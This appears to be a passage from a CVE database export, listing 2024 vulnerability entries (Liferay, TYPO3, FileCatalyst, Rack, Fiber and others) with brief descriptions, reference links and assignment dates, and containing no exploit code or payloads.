CVE    2024    25189    Candidate    libjwt 1.15.3 uses strcmp (which is not constant time) to verify authentication, which makes it easier to bypass authentication via a timing side channel.    MISC:https://github.com/P3ngu1nW/CVE_Request/blob/main/benmcollins%3Alibjwt.md   |   MLIST:[debian-lts-announce] 20240225 [SECURITY] [DLA 3739-1] libjwt security update   |   URL:https://lists.debian.org/debian-lts-announce/2024/02/msg00009.html    Assigned (20240207)
CVE    2024    25180    Candidate    An issue discovered in pdfmake 0.2.9 allows remote attackers to run arbitrary code via crafted POST request to the path '/pdf'.    MISC:https://github.com/joaoviictorti/My-CVES/blob/main/CVE-2024-25180/README.md    Assigned (20240207)
CVE    2024    2518    Candidate    A vulnerability was found in MAGESH-K21 Online-College-Event-Hall-Reservation-System 1.0 and classified as problematic. This issue affects some unknown processing of the file book_history.php. The manipulation of the argument id leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-256955. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-256955 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.256955   |   MISC:VDB-256955 | MAGESH-K21 Online-College-Event-Hall-Reservation-System book_history.php cross site scripting   |   URL:https://vuldb.com/?id.256955   |   MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/Reflected%20XSS%20-%20book_history.php.md   |   URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/Reflected%20XSS%20-%20book_history.php.md    Assigned (20240315)
CVE    2024    25175    Candidate    An issue in Kickidler before v1.107.0 allows attackers to provide an XSS payload via an HTTP response splitting attack.    MISC:https://github.com/jet-pentest/CVE-2024-25175   |   MISC:https://www.kickidler.com/    Assigned (20240207)
CVE    2024    25170    Candidate    An issue in Mezzanine v6.0.0 allows attackers to bypass access controls via manipulating the Host header.    MISC:https://github.com/shenhav12/CVE-2024-25170-Mezzanine-v6.0.0   |   MISC:https://ibb.co/DpxHpz9   |   MISC:https://ibb.co/T0fhLwR    Assigned (20240207)
CVE    2024    2517    Candidate    A vulnerability has been found in MAGESH-K21 Online-College-Event-Hall-Reservation-System 1.0 and classified as critical. This vulnerability affects unknown code of the file book_history.php. The manipulation of the argument del_id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-256954 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-256954 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.256954   |   MISC:VDB-256954 | MAGESH-K21 Online-College-Event-Hall-Reservation-System book_history.php sql injection   |   URL:https://vuldb.com/?id.256954   |   MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/Blind%20SQL%20Injection%20-%20book_history.php.md   |   URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/Blind%20SQL%20Injection%20-%20book_history.php.md    Assigned (20240315)
CVE    2024    25169    Candidate    An issue in Mezzanine v6.0.0 allows attackers to bypass access control mechanisms in the admin panel via a crafted request.    MISC:https://github.com/shenhav12/CVE-2024-25169-Mezzanine-v6.0.0   |   MISC:https://ibb.co/JKh4hmD   |   MISC:https://ibb.co/Pt9qd8t   |   MISC:https://ibb.co/hLLPTVp   |   MISC:https://ibb.co/rfrKj3r    Assigned (20240207)
CVE    2024    25168    Candidate    SQL injection vulnerability in snow snow v.2.0.0 allows a remote attacker to execute arbitrary code via the dataScope parameter of the system/role/list interface.    MISC:https://github.com/biantaibao/snow_SQL/blob/main/report.md    Assigned (20240207)
CVE    2024    25167    Candidate    Cross Site Scripting vulnerability in eblog v1.0 allows a remote attacker to execute arbitrary code via a crafted script to the argument description parameter when submitting a comment on a post.    MISC:https://github.com/biantaibao/eblog_xss/blob/main/report.md    Assigned (20240207)
CVE    2024    25166    Candidate    Cross Site Scripting vulnerability in 71CMS v.1.0.0 allows a remote attacker to execute arbitrary code via the uploadfile action parameter in the controller.php file.    MISC:https://github.com/xiaocheng-keji/71cms/issues/1    Assigned (20240207)
CVE    2024    25165    Candidate    A global-buffer-overflow vulnerability was found in SWFTools v0.9.2, in the function LineText at lib/swf5compiler.flex.    MISC:https://github.com/matthiaskramm/swftools/issues/217    Assigned (20240207)
CVE    2024    25164    Candidate    A Path Traversal vulnerability exists in iDURAR v2.0.0 that allows unauthenticated attackers to expose sensitive files via the download functionality.    MISC:https://github.com/idurar/idurar-erp-crm/tree/2.0.0/routes/erpRoutes/erpDownloadRouter.js   |   MISC:https://github.com/u32i/cve/tree/main/CVE-2024-25164    Assigned (20240207)
CVE    2024    2516    Candidate    A vulnerability, which was classified as critical, was found in MAGESH-K21 Online-College-Event-Hall-Reservation-System 1.0. This affects an unknown part of the file home.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-256953 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-256953 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.256953   |   MISC:VDB-256953 | MAGESH-K21 Online-College-Event-Hall-Reservation-System home.php sql injection   |   URL:https://vuldb.com/?id.256953   |   MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/Blind%20SQL%20Injection%20-%20home.php.md   |   URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/Blind%20SQL%20Injection%20-%20home.php.md    Assigned (20240315)
CVE    2024    25156    Candidate    A path traversal vulnerability exists in GoAnywhere MFT prior to 7.4.2 which allows attackers to circumvent endpoint-specific permission checks in the GoAnywhere Admin and Web Clients.    MISC:https://www.fortra.com/security/advisory/fi-2024-004   |   URL:https://www.fortra.com/security/advisory/fi-2024-004    Assigned (20240206)
CVE    2024    25155    Candidate    In FileCatalyst Direct 3.8.8 and earlier through 3.8.6, the web server does not properly sanitize illegal characters in a URL which is then displayed on a subsequent error page. A malicious actor could craft a URL which would then execute arbitrary code within an HTML script tag.    MISC:https://filecatalyst.software/public/filecatalyst/Direct/3.8.9.90/whatsnew_direct.html   |   URL:https://filecatalyst.software/public/filecatalyst/Direct/3.8.9.90/whatsnew_direct.html   |   MISC:https://www.fortra.com/security/advisory/fi-2024-003   |   URL:https://www.fortra.com/security/advisory/fi-2024-003    Assigned (20240206)
CVE    2024    25154    Candidate    Improper URL validation leads to path traversal in FileCatalyst Direct 3.8.8 and earlier allowing an encoded payload to cause the web server to return files located outside of the web root which may lead to data leakage.    MISC:https://filecatalyst.software/public/filecatalyst/Direct/3.8.9.90/whatsnew_direct.html   |   URL:https://filecatalyst.software/public/filecatalyst/Direct/3.8.9.90/whatsnew_direct.html   |   MISC:https://www.fortra.com/security/advisory/fi-2024-003   |   URL:https://www.fortra.com/security/advisory/fi-2024-003    Assigned (20240206)
CVE    2024    25153    Candidate    A directory traversal within the ‘ftpservlet’ of the FileCatalyst Workflow Web Portal allows files to be uploaded outside of the intended ‘uploadtemp’ directory with a specially crafted POST request. In situations where a file is successfully uploaded to the web portal’s DocumentRoot, specially crafted JSP files could be used to execute code, including web shells.    MISC:https://filecatalyst.software/public/filecatalyst/Workflow/5.1.6.114/fcweb_releasenotes.html   |   URL:https://filecatalyst.software/public/filecatalyst/Workflow/5.1.6.114/fcweb_releasenotes.html   |   MISC:https://www.fortra.com/security/advisory/fi-2024-002   |   URL:https://www.fortra.com/security/advisory/fi-2024-002    Assigned (20240206)
CVE    2024    25152    Candidate    Stored cross-site scripting (XSS) vulnerability in Message Board widget in Liferay Portal 7.2.0 through 7.4.2, and older unsupported versions, and Liferay DXP 7.3 before service pack 3, 7.2 before fix pack 17, and older unsupported versions allows remote authenticated users to inject arbitrary web script or HTML via the filename of an attachment.    MISC:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25152   |   URL:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25152    Assigned (20240206)
CVE    2024    25151    Candidate    The Calendar module in Liferay Portal 7.2.0 through 7.4.2, and older unsupported versions, and Liferay DXP 7.3 before service pack 3, 7.2 before fix pack 15, and older unsupported versions does not escape user supplied data in the default notification email template, which allows remote authenticated users to inject arbitrary web script or HTML via the title of a calendar event or the user's name. This may lead to content spoofing or cross-site scripting (XSS) attacks depending on the capability of the receiver's mail client.    MISC:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25151   |   URL:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25151    Assigned (20240206)
CVE    2024    25150    Candidate    Information disclosure vulnerability in the Control Panel in Liferay Portal 7.2.0 through 7.4.2, and older unsupported versions, and Liferay DXP 7.3 before update 4, 7.2 before fix pack 19, and older unsupported versions allows remote authenticated users to obtain a user's full name from the page's title by enumerating user screen names.    MISC:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25150   |   URL:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25150    Assigned (20240206)
CVE    2024    2515    Candidate    A vulnerability, which was classified as problematic, has been found in MAGESH-K21 Online-College-Event-Hall-Reservation-System 1.0. Affected by this issue is some unknown functionality of the file home.php. The manipulation of the argument id leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-256952. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-256952 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.256952   |   MISC:VDB-256952 | MAGESH-K21 Online-College-Event-Hall-Reservation-System home.php cross site scripting   |   URL:https://vuldb.com/?id.256952   |   MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/Reflected%20XSS%20-%20home.php.md   |   URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/Reflected%20XSS%20-%20home.php.md    Assigned (20240315)
CVE    2024    25149    Candidate    Liferay Portal 7.2.0 through 7.4.1, and older unsupported versions, and Liferay DXP 7.3 before service pack 3, 7.2 before fix pack 15, and older unsupported versions does not properly restrict membership of a child site when the "Limit membership to members of the parent site" option is enabled, which allows remote authenticated users to add users who are not a member of the parent site to a child site. The added user may obtain permission to perform unauthorized actions in the child site.    MISC:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25149   |   URL:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25149    Assigned (20240206)
CVE    2024    25148    Candidate    In Liferay Portal 7.2.0 through 7.4.1, and older unsupported versions, and Liferay DXP 7.3 before service pack 3, 7.2 before fix pack 15, and older unsupported versions the `doAsUserId` URL parameter may get leaked when creating linked content using the WYSIWYG editor and while impersonating a user. This may allow remote authenticated users to impersonate a user after accessing the linked content.    MISC:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25148   |   URL:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25148    Assigned (20240206)
CVE    2024    25147    Candidate    Cross-site scripting (XSS) vulnerability in HtmlUtil.escapeJsLink in Liferay Portal 7.2.0 through 7.4.1, and older unsupported versions, and Liferay DXP 7.3 before service pack 3, 7.2 before fix pack 15, and older unsupported versions allows remote attackers to inject arbitrary web script or HTML via crafted javascript: style links.    MISC:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25147   |   URL:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25147    Assigned (20240206)
CVE    2024    25146    Candidate    Liferay Portal 7.2.0 through 7.4.1, and older unsupported versions, and Liferay DXP 7.3 before service pack 3, 7.2 before fix pack 18, and older unsupported versions returns with different responses depending on whether a site does not exist or if the user does not have permission to access the site, which allows remote attackers to discover the existence of sites by enumerating URLs. This vulnerability occurs if locale.prepend.friendly.url.style=2 and if a custom 404 page is used.    MISC:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25146   |   URL:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25146    Assigned (20240206)
CVE    2024    25145    Candidate    Stored cross-site scripting (XSS) vulnerability in the Portal Search module's Search Result app in Liferay Portal 7.2.0 through 7.4.3.11, and older unsupported versions, and Liferay DXP 7.4 before update 8, 7.3 before update 4, 7.2 before fix pack 17, and older unsupported versions allows remote authenticated users to inject arbitrary web script or HTML into the Search Result app's search result if highlighting is disabled by adding any searchable content (e.g., blog, message board message, web content article) to the application.    MISC:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25145   |   URL:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25145    Assigned (20240206)
CVE    2024    25144    Candidate    The IFrame widget in Liferay Portal 7.2.0 through 7.4.3.26, and older unsupported versions, and Liferay DXP 7.4 before update 27, 7.3 before update 6, 7.2 before fix pack 19, and older unsupported versions does not check the URL of the IFrame, which allows remote authenticated users to cause a denial-of-service (DoS) via a self referencing IFrame.    MISC:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25144   |   URL:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25144    Assigned (20240206)
CVE    2024    25143    Candidate    The Document and Media widget in Liferay Portal 7.2.0 through 7.3.6, and older unsupported versions, and Liferay DXP 7.3 before service pack 3, 7.2 before fix pack 13, and older unsupported versions, does not limit resource consumption when generating a preview image, which allows remote authenticated users to cause a denial of service (memory consumption) via crafted PNG images.    MISC:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25143   |   URL:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25143    Assigned (20240206)
CVE    2024    25141    Candidate    When ssl was enabled for Mongo Hook, default settings included "allow_insecure", which meant that certificates were not validated. This was unexpected and undocumented. Users are recommended to upgrade to version 4.0.0, which fixes this issue.    MISC:https://github.com/apache/airflow/pull/37214   |   URL:https://github.com/apache/airflow/pull/37214   |   MISC:https://lists.apache.org/thread/sqgbfqngjmn45ommmrgj7hvs7fgspsgm   |   URL:https://lists.apache.org/thread/sqgbfqngjmn45ommmrgj7hvs7fgspsgm   |   MLIST:[oss-security] 20240220 CVE-2024-25141: Apache Airflow Mongo Provider: Certificate validation isn't respected even if SSL is enabled for apache-airflow-providers-mongo   |   URL:http://www.openwall.com/lists/oss-security/2024/02/20/5    Assigned (20240206)
CVE    2024    25140    Candidate    ** DISPUTED ** A default installation of RustDesk 1.2.3 on Windows places a WDKTestCert certificate under Trusted Root Certification Authorities with Enhanced Key Usage of Code Signing (1.3.6.1.5.5.7.3.3), valid from 2023 until 2033. This is potentially unwanted, e.g., because there is no public documentation of security measures for the private key, and arbitrary software could be signed if the private key were to be compromised. NOTE: the vendor's position is "we do not have EV cert, so we use test cert as a workaround." Insertion into Trusted Root Certification Authorities was the originally intended behavior, and the UI ensured that the certificate installation step (checked by default) was visible to the user before proceeding with the product installation.    MISC:https://github.com/rustdesk/rustdesk/discussions/6444   |   MISC:https://news.ycombinator.com/item?id=39256493   |   MISC:https://serverfault.com/questions/837994    Assigned (20240206)
CVE    2024    2514    Candidate    A vulnerability classified as critical was found in MAGESH-K21 Online-College-Event-Hall-Reservation-System 1.0. Affected by this vulnerability is an unknown functionality of the file /login.php. The manipulation of the argument email leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-256951. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-256951 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.256951   |   MISC:VDB-256951 | MAGESH-K21 Online-College-Event-Hall-Reservation-System login.php sql injection   |   URL:https://vuldb.com/?id.256951   |   MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/SQL%20Injection%20Auth%20bypass%20-%20login.php.md   |   URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/MAGESH-K21%20%20Online-College-Event-Hall-Reservation-System/SQL%20Injection%20Auth%20bypass%20-%20login.php.md    Assigned (20240315)
CVE    2024    25139    Candidate    In TP-Link Omada er605 1.0.1 through (v2.6) 2.2.3, a cloud-brd binary is susceptible to an integer overflow that leads to a heap-based buffer overflow. After heap shaping, an attacker can achieve code execution in the context of the cloud-brd binary that runs at the root level. This is fixed in ER605(UN)_v2_2.2.4 Build 020240119.    MISC:https://github.com/microsoft/Microsoft-TP-Link-Research-Team   |   MISC:https://www.tp-link.com/us/omada-sdn/    Assigned (20240206)
CVE    2024    25130    Candidate    Tuleap is an open source suite to improve management of software developments and collaboration. Prior to version 15.5.99.76 of Tuleap Community Edition and prior to versions 15.5-4 and 15.4-7 of Tuleap Enterprise Edition, users with a read access to a tracker where the mass update feature is used might get access to restricted information. Tuleap Community Edition 15.5.99.76, Tuleap Enterprise Edition 15.5-4, and Tuleap Enterprise Edition 15.4-7 contain a patch for this issue.    MISC:https://github.com/Enalean/tuleap/commit/57978a32508f5c6d0365419b6eaeb368aee20667   |   URL:https://github.com/Enalean/tuleap/commit/57978a32508f5c6d0365419b6eaeb368aee20667   |   MISC:https://github.com/Enalean/tuleap/security/advisories/GHSA-mq7f-m6mj-hjj5   |   URL:https://github.com/Enalean/tuleap/security/advisories/GHSA-mq7f-m6mj-hjj5   |   MISC:https://tuleap.net/plugins/git/tuleap/tuleap/stable?a=commit&h=57978a32508f5c6d0365419b6eaeb368aee20667   |   URL:https://tuleap.net/plugins/git/tuleap/tuleap/stable?a=commit&h=57978a32508f5c6d0365419b6eaeb368aee20667   |   MISC:https://tuleap.net/plugins/tracker/?aid=36803   |   URL:https://tuleap.net/plugins/tracker/?aid=36803    Assigned (20240205)
CVE    2024    25129    Candidate    The CodeQL CLI repo holds binaries for the CodeQL command line interface (CLI). Prior to version 2.16.3, an XML parser used by the CodeQL CLI to read various auxiliary files is vulnerable to an XML External Entity attack. If a vulnerable version of the CLI is used to process either a maliciously modified CodeQL database, or a specially prepared set of QL query sources, the CLI can be made to make an outgoing HTTP request to a URL that contains material read from a local file chosen by the attacker. This may result in a loss of privacy or exfiltration of secrets. Security researchers and QL authors who receive databases or QL source files from untrusted sources may be impacted. A single untrusted `.ql` or `.qll` file cannot be affected, but a zip archive or tarball containing QL sources may unpack auxiliary files that will trigger an attack when CodeQL sees them in the file system. Those using CodeQL for routine analysis of source trees with a preselected set of trusted queries are not affected. In particular, extracting XML files from a source tree into the CodeQL database does not make one vulnerable. The problem is fixed in release 2.16.3 of the CodeQL CLI. Other than upgrading, workarounds include not accepting CodeQL databases or queries from untrusted sources, or only processing such material on a machine without an Internet connection. Customers who use older releases of CodeQL for security scanning in an automated CI system and cannot upgrade for compliance reasons can continue using that version. That use case is safe. If such customers have a private query pack and use the `codeql pack create` command to precompile them before using them in the CI system, they should be using the production CodeQL release to run `codeql pack create`. That command is safe as long as the QL source it precompiled is trusted. All other development of the query pack should use an upgraded CLI.    MISC:https://github.com/github/codeql-cli-binaries/releases/tag/v2.16.3   |   URL:https://github.com/github/codeql-cli-binaries/releases/tag/v2.16.3   |   MISC:https://github.com/github/codeql-cli-binaries/security/advisories/GHSA-gf8p-v3g3-3wph   |   URL:https://github.com/github/codeql-cli-binaries/security/advisories/GHSA-gf8p-v3g3-3wph   |   MISC:https://github.com/github/codeql/blob/main/java/ql/src/Security/CWE/CWE-611/XXELocal.ql   |   URL:https://github.com/github/codeql/blob/main/java/ql/src/Security/CWE/CWE-611/XXELocal.ql    Assigned (20240205)
CVE    2024    25128    Candidate    Flask-AppBuilder is an application development framework, built on top of Flask. When Flask-AppBuilder is set to AUTH_TYPE AUTH_OID, it allows an attacker to forge an HTTP request, that could deceive the backend into using any requested OpenID service. This vulnerability could grant an attacker unauthorised privilege access if a custom OpenID service is deployed by the attacker and accessible by the backend. This vulnerability is only exploitable when the application is using the OpenID 2.0 authorization protocol. Upgrade to Flask-AppBuilder 4.3.11 to fix the vulnerability.    MISC:https://github.com/dpgaspar/Flask-AppBuilder/commit/6336456d83f8f111c842b2b53d1e89627f2502c8   |   URL:https://github.com/dpgaspar/Flask-AppBuilder/commit/6336456d83f8f111c842b2b53d1e89627f2502c8   |   MISC:https://github.com/dpgaspar/Flask-AppBuilder/security/advisories/GHSA-j2pw-vp55-fqqj   |   URL:https://github.com/dpgaspar/Flask-AppBuilder/security/advisories/GHSA-j2pw-vp55-fqqj    Assigned (20240205)
CVE    2024    25126    Candidate    Rack is a modular Ruby web server interface. Carefully crafted content type headers can cause Rack’s media type parser to take much longer than expected, leading to a possible denial of service vulnerability (ReDos 2nd degree polynomial). This vulnerability is patched in 3.0.9.1 and 2.2.8.1.    MISC:https://discuss.rubyonrails.org/t/denial-of-service-vulnerability-in-rack-content-type-parsing/84941   |   URL:https://discuss.rubyonrails.org/t/denial-of-service-vulnerability-in-rack-content-type-parsing/84941   |   MISC:https://github.com/rack/rack/commit/6efb2ceea003c4b195815a614e00438cbd543462   |   URL:https://github.com/rack/rack/commit/6efb2ceea003c4b195815a614e00438cbd543462   |   MISC:https://github.com/rack/rack/commit/d9c163a443b8cadf4711d84bd2c58cb9ef89cf49   |   URL:https://github.com/rack/rack/commit/d9c163a443b8cadf4711d84bd2c58cb9ef89cf49   |   MISC:https://github.com/rack/rack/security/advisories/GHSA-22f2-v57c-j9cx   |   URL:https://github.com/rack/rack/security/advisories/GHSA-22f2-v57c-j9cx   |   MISC:https://github.com/rubysec/ruby-advisory-db/blob/master/gems/rack/CVE-2024-25126.yml   |   URL:https://github.com/rubysec/ruby-advisory-db/blob/master/gems/rack/CVE-2024-25126.yml    Assigned (20240205)
CVE    2024    25125    Candidate    Digdag is an open source tool to build, run, schedule, and monitor complex pipelines of tasks across various platforms. Treasure Data's digdag workload automation system is susceptible to a path traversal vulnerability if it's configured to store log files locally. This issue may lead to information disclosure and has been addressed in release version 0.10.5.1. Users are advised to upgrade. There are no known workarounds for this vulnerability.    MISC:https://github.com/treasure-data/digdag/commit/eae89b0daf6c62f12309d8c7194454dfb18cc5c3   |   URL:https://github.com/treasure-data/digdag/commit/eae89b0daf6c62f12309d8c7194454dfb18cc5c3   |   MISC:https://github.com/treasure-data/digdag/security/advisories/GHSA-5mp4-32rr-v3x5   |   URL:https://github.com/treasure-data/digdag/security/advisories/GHSA-5mp4-32rr-v3x5    Assigned (20240205)
CVE    2024    25124    Candidate    Fiber is a web framework written in Go. Prior to version 2.52.1, the CORS middleware allows for insecure configurations that could potentially expose the application to multiple CORS-related vulnerabilities. Specifically, it allows setting the Access-Control-Allow-Origin header to a wildcard (`*`) while also having the Access-Control-Allow-Credentials set to true, which goes against recommended security best practices. The impact of this misconfiguration is high as it can lead to unauthorized access to sensitive user data and expose the system to various types of attacks listed in the PortSwigger article linked in the references. Version 2.52.1 contains a patch for this issue. As a workaround, users may manually validate the CORS configurations in their implementation to ensure that they do not allow a wildcard origin when credentials are enabled. The browser Fetch API, as well as browsers and utilities that enforce CORS policies, are not affected by this.    MISC:http://blog.portswigger.net/2016/10/exploiting-cors-misconfigurations-for.html   |   URL:http://blog.portswigger.net/2016/10/exploiting-cors-misconfigurations-for.html   |   MISC:https://codeql.github.com/codeql-query-help/javascript/js-cors-misconfiguration-for-credentials   |   URL:https://codeql.github.com/codeql-query-help/javascript/js-cors-misconfiguration-for-credentials   |   MISC:https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS/Errors/CORSNotSupportingCredentials   |   URL:https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS/Errors/CORSNotSupportingCredentials   |   MISC:https://fetch.spec.whatwg.org/#cors-protocol-and-credentials   |   URL:https://fetch.spec.whatwg.org/#cors-protocol-and-credentials   |   MISC:https://github.com/gofiber/fiber/commit/f0cd3b44b086544a37886232d0530601f2406c23   |   URL:https://github.com/gofiber/fiber/commit/f0cd3b44b086544a37886232d0530601f2406c23   |   MISC:https://github.com/gofiber/fiber/releases/tag/v2.52.1   |   URL:https://github.com/gofiber/fiber/releases/tag/v2.52.1   |   MISC:https://github.com/gofiber/fiber/security/advisories/GHSA-fmg4-x8pw-hjhg   |   URL:https://github.com/gofiber/fiber/security/advisories/GHSA-fmg4-x8pw-hjhg   |   MISC:https://saturncloud.io/blog/cors-cannot-use-wildcard-in-accesscontrolalloworigin-when-credentials-flag-is-true   |   URL:https://saturncloud.io/blog/cors-cannot-use-wildcard-in-accesscontrolalloworigin-when-credentials-flag-is-true    Assigned (20240205)
CVE    2024    25123    Candidate    MSS (Mission Support System) is an open source package designed for planning atmospheric research flights. In file: `index.py`, there is a method that is vulnerable to path manipulation attack. By modifying file paths, an attacker can acquire sensitive information from different resources. The `filename` variable is joined with other variables to form a file path in `_file`. However, `filename` is a route parameter that can capture path type values i.e. values including slashes (\). So it is possible for an attacker to manipulate the file being read by assigning a value containing ../ to `filename` and so the attacker may be able to gain access to other files on the host filesystem. This issue has been addressed in MSS version 8.3.3. Users are advised to upgrade. There are no known workarounds for this vulnerability.    MISC:https://github.com/Open-MSS/MSS/commit/f23033729ee930b97f8bdbd07df0174311c9b658   |   URL:https://github.com/Open-MSS/MSS/commit/f23033729ee930b97f8bdbd07df0174311c9b658   |   MISC:https://github.com/Open-MSS/MSS/security/advisories/GHSA-pf2h-qjcr-qvq2   |   URL:https://github.com/Open-MSS/MSS/security/advisories/GHSA-pf2h-qjcr-qvq2    Assigned (20240205)
CVE    2024    25122    Candidate    sidekiq-unique-jobs is an open source project which prevents simultaneous Sidekiq jobs with the same unique arguments from running. Specially crafted GET request parameters handled by any of the following endpoints of sidekiq-unique-jobs' "admin" web UI allow a super-user attacker, or an unwitting, but authorized, victim, who has received a disguised / crafted link, to successfully execute malicious code, which could potentially steal cookies, session data, or local storage data from the app the sidekiq-unique-jobs web UI is mounted in. 1. `/changelogs`, 2. `/locks` or 3. `/expiring_locks`. This issue has been addressed in versions 7.1.33 and 8.0.7. Users are advised to upgrade. There are no known workarounds for this vulnerability.    MISC:https://github.com/mhenrixon/sidekiq-unique-jobs/commit/ec3afd920c1b55843c72f748a87baac7f8be82ed   |   URL:https://github.com/mhenrixon/sidekiq-unique-jobs/commit/ec3afd920c1b55843c72f748a87baac7f8be82ed   |   MISC:https://github.com/mhenrixon/sidekiq-unique-jobs/security/advisories/GHSA-cmh9-rx85-xj38   |   URL:https://github.com/mhenrixon/sidekiq-unique-jobs/security/advisories/GHSA-cmh9-rx85-xj38    Assigned (20240205)
CVE    2024    25121    Candidate    TYPO3 is an open source PHP based web content management system released under the GNU GPL. In affected versions of TYPO3 entities of the File Abstraction Layer (FAL) could be persisted directly via `DataHandler`. This allowed attackers to reference files in the fallback storage directly and retrieve their file names and contents. The fallback storage ("zero-storage") is used as a backward compatibility layer for files located outside properly configured file storages and within the public web root directory. Exploiting this vulnerability requires a valid backend user account. Users are advised to update to TYPO3 version 8.7.57 ELTS, 9.5.46 ELTS, 10.4.43 ELTS, 11.5.35 LTS, 12.4.11 LTS, or 13.0.1 which fix the problem described. When persisting entities of the File Abstraction Layer directly via DataHandler, `sys_file` entities are now denied by default, and `sys_file_reference` & `sys_file_metadata` entities are not permitted to reference files in the fallback storage anymore. When importing data from secure origins, this must be explicitly enabled in the corresponding DataHandler instance by using `$dataHandler->isImporting = true;`.    MISC:https://github.com/TYPO3/typo3/security/advisories/GHSA-rj3x-wvc6-5j66   |   URL:https://github.com/TYPO3/typo3/security/advisories/GHSA-rj3x-wvc6-5j66   |   MISC:https://typo3.org/security/advisory/typo3-core-sa-2024-006   |   URL:https://typo3.org/security/advisory/typo3-core-sa-2024-006    Assigned (20240205)
CVE    2024    25120    Candidate    TYPO3 is an open source PHP based web content management system released under the GNU GPL. The TYPO3-specific `t3://` URI scheme could be used to access resources outside of the users' permission scope. This encompassed files, folders, pages, and records (although only if a valid link-handling configuration was provided). Exploiting this vulnerability requires a valid backend user account. Users are advised to update to TYPO3 versions 8.7.57 ELTS, 9.5.46 ELTS, 10.4.43 ELTS, 11.5.35 LTS, 12.4.11 LTS, 13.0.1 that fix the problem described. There are no known workarounds for this issue.    MISC:https://docs.typo3.org/m/typo3/reference-typoscript/main/en-us/Functions/Typolink.html#resource-references   |   URL:https://docs.typo3.org/m/typo3/reference-typoscript/main/en-us/Functions/Typolink.html#resource-references   |   MISC:https://github.com/TYPO3/typo3/security/advisories/GHSA-wf85-8hx9-gj7c   |   URL:https://github.com/TYPO3/typo3/security/advisories/GHSA-wf85-8hx9-gj7c   |   MISC:https://typo3.org/security/advisory/typo3-core-sa-2024-005   |   URL:https://typo3.org/security/advisory/typo3-core-sa-2024-005    Assigned (20240205)
